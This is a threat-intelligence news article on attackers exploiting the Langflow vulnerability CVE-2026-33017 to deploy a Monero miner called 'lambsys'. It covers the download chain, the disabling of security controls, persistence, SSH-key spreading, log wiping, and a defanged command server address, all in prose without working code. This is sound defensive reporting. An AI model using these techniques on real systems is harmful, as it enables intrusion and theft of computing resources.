Threat Actors Weaponize Critical Langflow Flaw to Deploy Monero Miner
A critical unauthenticated remote code execution (RCE) vulnerability in Langflow, identified as **CVE-2026-33017**, is being actively exploited by threat actors. The campaign targets exposed AI application endpoints to deliver a **Monero** cryptocurrency miner, demonstrating a new entry point for illicit mining operations into enterprise networks.

Threat actors are leveraging **CVE-2026-33017** (CVSS score: 9.3), a severe RCE vulnerability in **Langflow**, to infiltrate systems and deploy a **Monero** cryptocurrency miner. This activity highlights a growing trend where AI application endpoints are being targeted as a vector for initial access to enterprise environments.
### The Attack Vector
The attacks, observed between March 27 and April 15, 2026, exploit the **Langflow** flaw to execute a single line of Python code. This script then downloads and launches a shell script, which in turn fetches and deploys the **Monero** miner binary.
**Trend Micro** researchers Simon Dulude and John Zhang detailed the campaign, noting that the attack chain is designed for efficiency and resilience.
### Malware Capabilities and Evasion
The deployed malware, dubbed "lambsys" by researchers, is engineered to terminate rival cryptocurrency miner processes associated with groups like **Kinsing**, **WatchDog**, **Rocke**, and **Outlaw**. It also deletes competing wallet and key material, disables host-level security controls such as **AppArmor**, **Ubuntu's Uncomplicated Firewall**, **iptables**, and **SELinux**, and establishes cron-based persistence.
The malware communicates with an external server (83.142.209[.]214:80) and can propagate to other systems by reusing SSH keys, transforming a compromised **Langflow** instance into a beachhead for wider network compromise.
### Persistence and Anti-Forensics
To maintain persistence and cover its tracks, the malware removes system logs and manipulates immutable attributes of critical files and directories (e.g., `~/.ssh/`, `/etc/crontab`, `/tmp/`). This reflects an understanding of common cryptojacking tactics and a deliberate effort to evade detection by rival groups and security tools.

The final stage involves fetching a bespoke **XMRig** miner from the command-and-control server. The malware also gathers the host's public IP address and location via `ipinfo[.]io` for operational decisions, such as optimal mining pool selection and potential geo-fencing.
### Evolution of the Threat
**Trend Micro** observed that an earlier version of the `lambsys` binary was compiled in May 2024, suggesting the threat actors have been refining their malware for over two years, focusing on evasion techniques.
This exploitation of **Langflow** is not an isolated incident. In June 2025, another critical vulnerability in **Langflow**, **CVE-2025-3248** (CVSS score: 9.8), was exploited to distribute the **Flodrix** botnet malware.
This campaign underscores the critical need for robust security measures for AI application endpoints, as they are increasingly becoming attractive targets for threat actors seeking new avenues into enterprise networks.